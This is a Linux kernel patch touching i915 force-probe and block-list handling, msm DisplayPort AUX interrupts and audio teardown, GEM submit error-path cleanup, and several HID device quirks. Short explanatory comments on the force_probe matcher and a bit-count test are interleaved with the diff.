+@@ -30,12 +30,14 @@
+ 	{ FORCEWAKE_MT,             0,      0, "FORCEWAKE" }
+ 
+ #define COMMON_GEN9BASE_GLOBAL \
+-	{ GEN8_FAULT_TLB_DATA0,     0,      0, "GEN8_FAULT_TLB_DATA0" }, \
+-	{ GEN8_FAULT_TLB_DATA1,     0,      0, "GEN8_FAULT_TLB_DATA1" }, \
+ 	{ ERROR_GEN6,               0,      0, "ERROR_GEN6" }, \
+ 	{ DONE_REG,                 0,      0, "DONE_REG" }, \
+ 	{ HSW_GTT_CACHE_EN,         0,      0, "HSW_GTT_CACHE_EN" }
+ 
++#define GEN9_GLOBAL \
++	{ GEN8_FAULT_TLB_DATA0,     0,      0, "GEN8_FAULT_TLB_DATA0" }, \
++	{ GEN8_FAULT_TLB_DATA1,     0,      0, "GEN8_FAULT_TLB_DATA1" }
++
+ #define COMMON_GEN12BASE_GLOBAL \
+ 	{ GEN12_FAULT_TLB_DATA0,    0,      0, "GEN12_FAULT_TLB_DATA0" }, \
+ 	{ GEN12_FAULT_TLB_DATA1,    0,      0, "GEN12_FAULT_TLB_DATA1" }, \
+@@ -136,6 +138,7 @@ static const struct __guc_mmio_reg_descr xe_lpd_blt_inst_regs[] = {
+ static const struct __guc_mmio_reg_descr default_global_regs[] = {
+ 	COMMON_BASE_GLOBAL,
+ 	COMMON_GEN9BASE_GLOBAL,
++	GEN9_GLOBAL,
+ };
+ 
+ static const struct __guc_mmio_reg_descr default_rc_class_regs[] = {
+diff --git a/drivers/gpu/drm/i915/i915_params.c b/drivers/gpu/drm/i915/i915_params.c
+index d1e4d528cb174..5b24dd50fb6a4 100644
+--- a/drivers/gpu/drm/i915/i915_params.c
++++ b/drivers/gpu/drm/i915/i915_params.c
+@@ -122,7 +122,7 @@ i915_param_named_unsafe(enable_psr2_sel_fetch, bool, 0400,
+ 	"Default: 0");
+ 
+ i915_param_named_unsafe(force_probe, charp, 0400,
+-	"Force probe the driver for specified devices. "
++	"Force probe options for specified supported devices. "
+ 	"See CONFIG_DRM_I915_FORCE_PROBE for details.");
+ 
+ i915_param_named_unsafe(disable_power_well, int, 0400,
+diff --git a/drivers/gpu/drm/i915/i915_pci.c b/drivers/gpu/drm/i915/i915_pci.c
+index a2efc0b9d50c8..efa80475fbfed 100644
+--- a/drivers/gpu/drm/i915/i915_pci.c
++++ b/drivers/gpu/drm/i915/i915_pci.c
+@@ -1252,7 +1252,7 @@ static void i915_pci_remove(struct pci_dev *pdev)
+ }
+ 
+ /* is device_id present in comma separated list of ids */
+-static bool force_probe(u16 device_id, const char *devices)
++static bool device_id_in_list(u16 device_id, const char *devices, bool negative)
+ {
+ 	char *s, *p, *tok;
+ 	bool ret;
+@@ -1261,7 +1261,9 @@ static bool force_probe(u16 device_id, const char *devices)
+ 		return false;
+ 
+ 	/* match everything */
+-	if (strcmp(devices, "*") == 0)
++	if (negative && strcmp(devices, "!*") == 0)
++		return true;
++	if (!negative && strcmp(devices, "*") == 0)
+ 		return true;
+ 
+ 	s = kstrdup(devices, GFP_KERNEL);
+@@ -1271,6 +1273,12 @@ static bool force_probe(u16 device_id, const char *devices)
+ 	for (p = s, ret = false; (tok = strsep(&p, ",")) != NULL; ) {
+ 		u16 val;
+ 
++		if (negative && tok[0] == '!')
++			tok++;
++		else if ((negative && tok[0] != '!') ||
++			 (!negative && tok[0] == '!'))
++			continue;
++
+ 		if (kstrtou16(tok, 16, &val) == 0 && val == device_id) {
+ 			ret = true;
+ 			break;
+@@ -1282,6 +1290,16 @@ static bool force_probe(u16 device_id, const char *devices)
+ 	return ret;
+ }
+ 
++static bool id_forced(u16 device_id)
++{
++	return device_id_in_list(device_id, i915_modparams.force_probe, false);
++}
++
++static bool id_blocked(u16 device_id)
++{
++	return device_id_in_list(device_id, i915_modparams.force_probe, true);
++}
++
+ bool i915_pci_resource_valid(struct pci_dev *pdev, int bar)
+ {
+ 	if (!pci_resource_flags(pdev, bar))
+@@ -1309,10 +1327,9 @@ static int i915_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		(struct intel_device_info *) ent->driver_data;
+ 	int err;
+ 
+-	if (intel_info->require_force_probe &&
+-	    !force_probe(pdev->device, i915_modparams.force_probe)) {
++	if (intel_info->require_force_probe && !id_forced(pdev->device)) {
+ 		dev_info(&pdev->dev,
+-			 "Your graphics device %04x is not properly supported by the driver in this\n"
++			 "Your graphics device %04x is not properly supported by i915 in this\n"
+ 			 "kernel version. To force driver probe anyway, use i915.force_probe=%04x\n"
+ 			 "module parameter or CONFIG_DRM_I915_FORCE_PROBE=%04x configuration option,\n"
+ 			 "or (recommended) check for kernel updates.\n",
+@@ -1320,6 +1337,18 @@ static int i915_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		return -ENODEV;
+ 	}
+ 
++	if (id_blocked(pdev->device)) {
++		dev_info(&pdev->dev, "I915 probe blocked for Device ID %04x.\n",
++			 pdev->device);
++		return -ENODEV;
++	}
++
++	if (intel_info->require_force_probe) {
++		dev_info(&pdev->dev, "Force probing unsupported Device ID %04x, tainting kernel\n",
++			 pdev->device);
++		add_taint(TAINT_USER, LOCKDEP_STILL_OK);
++	}
++
+ 	/* Only bind to function 0 of the device. Early generations
+ 	 * used function 1 as a placeholder for multi-head. This causes
+ 	 * us confusion instead, especially on the systems where both
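With the change above, one comma-separated string drives both lookups: id_forced() scans it for plain IDs and id_blocked() for '!'-prefixed ones, so i915.force_probe=4500,!4571 force-probes device 4500 while blocking 4571. A standalone sketch of the matcher (strsep()/strtoul() replace the kernel's kstrdup()/kstrtou16(); this is an illustration, not the i915 code itself):

	#define _DEFAULT_SOURCE	/* for strsep() on glibc */
	#include <stdbool.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>

	static bool id_in_list(unsigned long id, const char *devices, bool negative)
	{
		char *s, *p, *tok;
		bool ret = false;

		if (!devices || !devices[0])
			return false;
		/* wildcards: "*" matches every ID, "!*" blocks every ID */
		if (negative && strcmp(devices, "!*") == 0)
			return true;
		if (!negative && strcmp(devices, "*") == 0)
			return true;

		s = strdup(devices);
		if (!s)
			return false;
		for (p = s; (tok = strsep(&p, ",")) != NULL; ) {
			if (negative && tok[0] == '!')
				tok++;		/* strip the '!' marker */
			else if ((negative && tok[0] != '!') ||
				 (!negative && tok[0] == '!'))
				continue;	/* entry belongs to the other list */
			if (strtoul(tok, NULL, 16) == id) {
				ret = true;
				break;
			}
		}
		free(s);
		return ret;
	}

	int main(void)
	{
		const char *param = "4500,!4571";

		printf("forced 4500:  %d\n", id_in_list(0x4500, param, false)); /* 1 */
		printf("blocked 4571: %d\n", id_in_list(0x4571, param, true));  /* 1 */
		return 0;
	}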
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_interrupts.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_interrupts.c
+index cf1b6d84c18a3..75e1b89c9eacf 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_interrupts.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_interrupts.c
+@@ -15,7 +15,7 @@
+ 
+ /*
+  * Register offsets in MDSS register file for the interrupt registers
+- * w.r.t. to the MDP base
++ * w.r.t. the MDP base
+  */
+ #define MDP_SSPP_TOP0_OFF		0x0
+ #define MDP_INTF_0_OFF			0x6A000
+@@ -24,6 +24,9 @@
+ #define MDP_INTF_3_OFF			0x6B800
+ #define MDP_INTF_4_OFF			0x6C000
+ #define MDP_INTF_5_OFF			0x6C800
++#define INTF_INTR_EN			0x1c0
++#define INTF_INTR_STATUS		0x1c4
++#define INTF_INTR_CLEAR			0x1c8
+ #define MDP_AD4_0_OFF			0x7C000
+ #define MDP_AD4_1_OFF			0x7D000
+ #define MDP_AD4_INTR_EN_OFF		0x41c
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+index 7ce66bf3f4c8d..b2a94b9a3e987 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+@@ -56,11 +56,6 @@
+ #define   INTF_TPG_RGB_MAPPING          0x11C
+ #define   INTF_PROG_FETCH_START         0x170
+ #define   INTF_PROG_ROT_START           0x174
+-
+-#define   INTF_FRAME_LINE_COUNT_EN      0x0A8
+-#define   INTF_FRAME_COUNT              0x0AC
+-#define   INTF_LINE_COUNT               0x0B0
+-
+ #define   INTF_MUX                      0x25C
+ 
+ #define INTF_CFG_ACTIVE_H_EN	BIT(29)
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
+index 2d28afdf860ef..a3e413d277175 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
+@@ -61,6 +61,7 @@ static const struct dpu_wb_cfg *_wb_offset(enum dpu_wb wb,
+ 	for (i = 0; i < m->wb_count; i++) {
+ 		if (wb == m->wb[i].id) {
+ 			b->blk_addr = addr + m->wb[i].base;
++			b->log_mask = DPU_DBG_MASK_WB;
+ 			return &m->wb[i];
+ 		}
+ 	}
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hwio.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hwio.h
+index c8156ed4b7fb8..93081e82c6d74 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hwio.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hwio.h
+@@ -20,9 +20,6 @@
+ #define HIST_INTR_EN                    0x01c
+ #define HIST_INTR_STATUS                0x020
+ #define HIST_INTR_CLEAR                 0x024
+-#define INTF_INTR_EN                    0x1C0
+-#define INTF_INTR_STATUS                0x1C4
+-#define INTF_INTR_CLEAR                 0x1C8
+ #define SPLIT_DISPLAY_EN                0x2F4
+ #define SPLIT_DISPLAY_UPPER_PIPE_CTRL   0x2F8
+ #define DSPP_IGC_COLOR0_RAM_LUTN        0x300
+diff --git a/drivers/gpu/drm/msm/dp/dp_audio.c b/drivers/gpu/drm/msm/dp/dp_audio.c
+index 6666783e1468e..1245c7aa49df8 100644
+--- a/drivers/gpu/drm/msm/dp/dp_audio.c
++++ b/drivers/gpu/drm/msm/dp/dp_audio.c
+@@ -593,6 +593,18 @@ static struct hdmi_codec_pdata codec_data = {
+ 	.i2s = 1,
+ };
+ 
++void dp_unregister_audio_driver(struct device *dev, struct dp_audio *dp_audio)
++{
++	struct dp_audio_private *audio_priv;
++
++	audio_priv = container_of(dp_audio, struct dp_audio_private, dp_audio);
++
++	if (audio_priv->audio_pdev) {
++		platform_device_unregister(audio_priv->audio_pdev);
++		audio_priv->audio_pdev = NULL;
++	}
++}
++
+ int dp_register_audio_driver(struct device *dev,
+ 		struct dp_audio *dp_audio)
+ {
+diff --git a/drivers/gpu/drm/msm/dp/dp_audio.h b/drivers/gpu/drm/msm/dp/dp_audio.h
+index 84e5f4a5d26ba..4ab78880af829 100644
+--- a/drivers/gpu/drm/msm/dp/dp_audio.h
++++ b/drivers/gpu/drm/msm/dp/dp_audio.h
+@@ -53,6 +53,8 @@ struct dp_audio *dp_audio_get(struct platform_device *pdev,
+ int dp_register_audio_driver(struct device *dev,
+ 		struct dp_audio *dp_audio);
+ 
++void dp_unregister_audio_driver(struct device *dev, struct dp_audio *dp_audio);
++
+ /**
+  * dp_audio_put()
+  *
+diff --git a/drivers/gpu/drm/msm/dp/dp_aux.c b/drivers/gpu/drm/msm/dp/dp_aux.c
+index cc3efed593aa1..84f9e3e5f9642 100644
+--- a/drivers/gpu/drm/msm/dp/dp_aux.c
++++ b/drivers/gpu/drm/msm/dp/dp_aux.c
+@@ -162,47 +162,6 @@ static ssize_t dp_aux_cmd_fifo_rx(struct dp_aux_private *aux,
+ 	return i;
+ }
+ 
+-static void dp_aux_native_handler(struct dp_aux_private *aux, u32 isr)
+-{
+-	if (isr & DP_INTR_AUX_I2C_DONE)
+-		aux->aux_error_num = DP_AUX_ERR_NONE;
+-	else if (isr & DP_INTR_WRONG_ADDR)
+-		aux->aux_error_num = DP_AUX_ERR_ADDR;
+-	else if (isr & DP_INTR_TIMEOUT)
+-		aux->aux_error_num = DP_AUX_ERR_TOUT;
+-	if (isr & DP_INTR_NACK_DEFER)
+-		aux->aux_error_num = DP_AUX_ERR_NACK;
+-	if (isr & DP_INTR_AUX_ERROR) {
+-		aux->aux_error_num = DP_AUX_ERR_PHY;
+-		dp_catalog_aux_clear_hw_interrupts(aux->catalog);
+-	}
+-}
+-
+-static void dp_aux_i2c_handler(struct dp_aux_private *aux, u32 isr)
+-{
+-	if (isr & DP_INTR_AUX_I2C_DONE) {
+-		if (isr & (DP_INTR_I2C_NACK | DP_INTR_I2C_DEFER))
+-			aux->aux_error_num = DP_AUX_ERR_NACK;
+-		else
+-			aux->aux_error_num = DP_AUX_ERR_NONE;
+-	} else {
+-		if (isr & DP_INTR_WRONG_ADDR)
+-			aux->aux_error_num = DP_AUX_ERR_ADDR;
+-		else if (isr & DP_INTR_TIMEOUT)
+-			aux->aux_error_num = DP_AUX_ERR_TOUT;
+-		if (isr & DP_INTR_NACK_DEFER)
+-			aux->aux_error_num = DP_AUX_ERR_NACK_DEFER;
+-		if (isr & DP_INTR_I2C_NACK)
+-			aux->aux_error_num = DP_AUX_ERR_NACK;
+-		if (isr & DP_INTR_I2C_DEFER)
+-			aux->aux_error_num = DP_AUX_ERR_DEFER;
+-		if (isr & DP_INTR_AUX_ERROR) {
+-			aux->aux_error_num = DP_AUX_ERR_PHY;
+-			dp_catalog_aux_clear_hw_interrupts(aux->catalog);
+-		}
+-	}
+-}
+-
+ static void dp_aux_update_offset_and_segment(struct dp_aux_private *aux,
+ 					     struct drm_dp_aux_msg *input_msg)
+ {
+@@ -427,13 +386,42 @@ void dp_aux_isr(struct drm_dp_aux *dp_aux)
+ 	if (!isr)
+ 		return;
+ 
+-	if (!aux->cmd_busy)
++	if (!aux->cmd_busy) {
++		DRM_ERROR("Unexpected DP AUX IRQ %#010x when not busy\n", isr);
+ 		return;
++	}
+ 
+-	if (aux->native)
+-		dp_aux_native_handler(aux, isr);
+-	else
+-		dp_aux_i2c_handler(aux, isr);
++	/*
++	 * The logic below assumes only one error bit is set (other than "done"
++	 * which can apparently be set at the same time as some of the other
++	 * bits). Warn if more than one get set so we know we need to improve
++	 * the logic.
++	 */
++	if (hweight32(isr & ~DP_INTR_AUX_XFER_DONE) > 1)
++		DRM_WARN("Some DP AUX interrupts unhandled: %#010x\n", isr);
++
++	if (isr & DP_INTR_AUX_ERROR) {
++		aux->aux_error_num = DP_AUX_ERR_PHY;
++		dp_catalog_aux_clear_hw_interrupts(aux->catalog);
++	} else if (isr & DP_INTR_NACK_DEFER) {
++		aux->aux_error_num = DP_AUX_ERR_NACK_DEFER;
++	} else if (isr & DP_INTR_WRONG_ADDR) {
++		aux->aux_error_num = DP_AUX_ERR_ADDR;
++	} else if (isr & DP_INTR_TIMEOUT) {
++		aux->aux_error_num = DP_AUX_ERR_TOUT;
++	} else if (!aux->native && (isr & DP_INTR_I2C_NACK)) {
++		aux->aux_error_num = DP_AUX_ERR_NACK;
++	} else if (!aux->native && (isr & DP_INTR_I2C_DEFER)) {
++		if (isr & DP_INTR_AUX_XFER_DONE)
++			aux->aux_error_num = DP_AUX_ERR_NACK;
++		else
++			aux->aux_error_num = DP_AUX_ERR_DEFER;
++	} else if (isr & DP_INTR_AUX_XFER_DONE) {
++		aux->aux_error_num = DP_AUX_ERR_NONE;
++	} else {
++		DRM_WARN("Unexpected interrupt: %#010x\n", isr);
++		return;
++	}
+ 
+ 	complete(&aux->comp);
+ }
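The consolidated handler above warns when more than one error bit is raised, using hweight32() as a population count. The equivalent test without a popcount primitive clears the lowest set bit and checks whether anything remains:

	#include <stdbool.h>
	#include <stdint.h>

	static bool more_than_one_bit_set(uint32_t x)
	{
		/* x & (x - 1) clears the lowest set bit of x */
		return (x & (x - 1)) != 0;
	}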
+diff --git a/drivers/gpu/drm/msm/dp/dp_catalog.c b/drivers/gpu/drm/msm/dp/dp_catalog.c
+index 676279d0ca8d9..421391755427d 100644
+--- a/drivers/gpu/drm/msm/dp/dp_catalog.c
++++ b/drivers/gpu/drm/msm/dp/dp_catalog.c
+@@ -27,7 +27,7 @@
+ #define DP_INTF_CONFIG_DATABUS_WIDEN     BIT(4)
+ 
+ #define DP_INTERRUPT_STATUS1 \
+-	(DP_INTR_AUX_I2C_DONE| \
++	(DP_INTR_AUX_XFER_DONE| \
+ 	DP_INTR_WRONG_ADDR | DP_INTR_TIMEOUT | \
+ 	DP_INTR_NACK_DEFER | DP_INTR_WRONG_DATA_CNT | \
+ 	DP_INTR_I2C_NACK | DP_INTR_I2C_DEFER | \
+diff --git a/drivers/gpu/drm/msm/dp/dp_catalog.h b/drivers/gpu/drm/msm/dp/dp_catalog.h
+index 1f717f45c1158..f36b7b372a065 100644
+--- a/drivers/gpu/drm/msm/dp/dp_catalog.h
++++ b/drivers/gpu/drm/msm/dp/dp_catalog.h
+@@ -13,7 +13,7 @@
+ 
+ /* interrupts */
+ #define DP_INTR_HPD		BIT(0)
+-#define DP_INTR_AUX_I2C_DONE	BIT(3)
++#define DP_INTR_AUX_XFER_DONE	BIT(3)
+ #define DP_INTR_WRONG_ADDR	BIT(6)
+ #define DP_INTR_TIMEOUT		BIT(9)
+ #define DP_INTR_NACK_DEFER	BIT(12)
+diff --git a/drivers/gpu/drm/msm/dp/dp_display.c b/drivers/gpu/drm/msm/dp/dp_display.c
+index c9d9b384ddd03..57b82e5d0ab12 100644
+--- a/drivers/gpu/drm/msm/dp/dp_display.c
++++ b/drivers/gpu/drm/msm/dp/dp_display.c
+@@ -323,6 +323,7 @@ static void dp_display_unbind(struct device *dev, struct device *master,
+ 	kthread_stop(dp->ev_tsk);
+ 
+ 	dp_power_client_deinit(dp->power);
++	dp_unregister_audio_driver(dev, dp->audio);
+ 	dp_aux_unregister(dp->aux);
+ 	dp->drm_dev = NULL;
+ 	dp->aux->drm_dev = NULL;
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index d8c9d184190bb..d6162561141c5 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -709,7 +709,7 @@ int msm_ioctl_gem_submit(struct drm_device *dev, void *data,
+ 	struct msm_drm_private *priv = dev->dev_private;
+ 	struct drm_msm_gem_submit *args = data;
+ 	struct msm_file_private *ctx = file->driver_priv;
+-	struct msm_gem_submit *submit;
++	struct msm_gem_submit *submit = NULL;
+ 	struct msm_gpu *gpu = priv->gpu;
+ 	struct msm_gpu_submitqueue *queue;
+ 	struct msm_ringbuffer *ring;
+@@ -756,13 +756,15 @@ int msm_ioctl_gem_submit(struct drm_device *dev, void *data,
+ 		out_fence_fd = get_unused_fd_flags(O_CLOEXEC);
+ 		if (out_fence_fd < 0) {
+ 			ret = out_fence_fd;
+-			return ret;
++			goto out_post_unlock;
+ 		}
+ 	}
+ 
+ 	submit = submit_create(dev, gpu, queue, args->nr_bos, args->nr_cmds);
+-	if (IS_ERR(submit))
+-		return PTR_ERR(submit);
++	if (IS_ERR(submit)) {
++		ret = PTR_ERR(submit);
++		goto out_post_unlock;
++	}
+ 
+ 	trace_msm_gpu_submit(pid_nr(submit->pid), ring->id, submit->ident,
+ 		args->nr_bos, args->nr_cmds);
+@@ -945,11 +947,20 @@ out:
+ 	if (has_ww_ticket)
+ 		ww_acquire_fini(&submit->ticket);
+ out_unlock:
+-	if (ret && (out_fence_fd >= 0))
+-		put_unused_fd(out_fence_fd);
+ 	mutex_unlock(&queue->lock);
+ out_post_unlock:
+-	msm_gem_submit_put(submit);
++	if (ret && (out_fence_fd >= 0))
++		put_unused_fd(out_fence_fd);
++
++	if (!IS_ERR_OR_NULL(submit)) {
++		msm_gem_submit_put(submit);
++	} else {
++		/*
++		 * If the submit hasn't yet taken ownership of the queue
++		 * then we need to drop the reference ourselves:
++		 */
++		msm_submitqueue_put(queue);
++	}
+ 	if (!IS_ERR_OR_NULL(post_deps)) {
+ 		for (i = 0; i < args->nr_out_syncobjs; ++i) {
+ 			kfree(post_deps[i].chain);
+diff --git a/drivers/gpu/drm/rockchip/dw_hdmi-rockchip.c b/drivers/gpu/drm/rockchip/dw_hdmi-rockchip.c
+index 2f4b8f64cbad3..ae857bf8bd624 100644
+--- a/drivers/gpu/drm/rockchip/dw_hdmi-rockchip.c
++++ b/drivers/gpu/drm/rockchip/dw_hdmi-rockchip.c
+@@ -640,6 +640,7 @@ static void dw_hdmi_rockchip_unbind(struct device *dev, struct device *master,
+ 	struct rockchip_hdmi *hdmi = dev_get_drvdata(dev);
+ 
+ 	dw_hdmi_unbind(hdmi->hdmi);
++	drm_encoder_cleanup(&hdmi->encoder.encoder);
+ 	clk_disable_unprepare(hdmi->ref_clk);
+ 
+ 	regulator_disable(hdmi->avdd_1v8);
+diff --git a/drivers/gpu/drm/tegra/sor.c b/drivers/gpu/drm/tegra/sor.c
+index 8af632740673a..77723d5f1d3fd 100644
+--- a/drivers/gpu/drm/tegra/sor.c
++++ b/drivers/gpu/drm/tegra/sor.c
+@@ -1153,7 +1153,7 @@ static int tegra_sor_compute_config(struct tegra_sor *sor,
+ 				    struct drm_dp_link *link)
+ {
+ 	const u64 f = 100000, link_rate = link->rate * 1000;
+-	const u64 pclk = mode->clock * 1000;
++	const u64 pclk = (u64)mode->clock * 1000;
+ 	u64 input, output, watermark, num;
+ 	struct tegra_sor_params params;
+ 	u32 num_syms_per_line;
+diff --git a/drivers/hid/hid-apple.c b/drivers/hid/hid-apple.c
+index c671ce94671ca..37b2ce9b50fe8 100644
+--- a/drivers/hid/hid-apple.c
++++ b/drivers/hid/hid-apple.c
+@@ -854,14 +854,16 @@ static const struct hid_device_id apple_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER3_ANSI),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER3_ISO),
+-		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
++		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
++			APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER3_JIS),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
+ 			APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_ANSI),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_ISO),
+-		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
++		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
++			APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_JIS),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
+ 			APPLE_RDESC_JIS },
+@@ -880,7 +882,8 @@ static const struct hid_device_id apple_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_HF_ANSI),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_HF_ISO),
+-		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
++		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
++			APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_HF_JIS),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
+ 			APPLE_RDESC_JIS },
+@@ -921,31 +924,31 @@ static const struct hid_device_id apple_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING_ANSI),
+ 		.driver_data = APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING_ISO),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING2_ANSI),
+ 		.driver_data = APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING2_ISO),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING2_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING3_ANSI),
+ 		.driver_data = APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING3_ISO),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING3_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4_ANSI),
+ 		.driver_data = APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4_ISO),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4A_ANSI),
+ 		.driver_data = APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4A_ISO),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4A_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING5_ANSI),
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 2235d78784b1b..53c6692d77714 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -415,6 +415,7 @@
+ #define I2C_DEVICE_ID_HP_SPECTRE_X360_15	0x2817
+ #define I2C_DEVICE_ID_HP_SPECTRE_X360_13_AW0020NG  0x29DF
+ #define I2C_DEVICE_ID_ASUS_TP420IA_TOUCHSCREEN 0x2BC8
++#define I2C_DEVICE_ID_ASUS_GV301RA_TOUCHSCREEN 0x2C82
+ #define USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN	0x2544
+ #define USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN	0x2706
+ #define I2C_DEVICE_ID_SURFACE_GO_TOUCHSCREEN	0x261A
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index c3f80b516f398..3acaaca888acd 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -372,6 +372,8 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_TP420IA_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_GV301RA_TOUCHSCREEN),
++	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
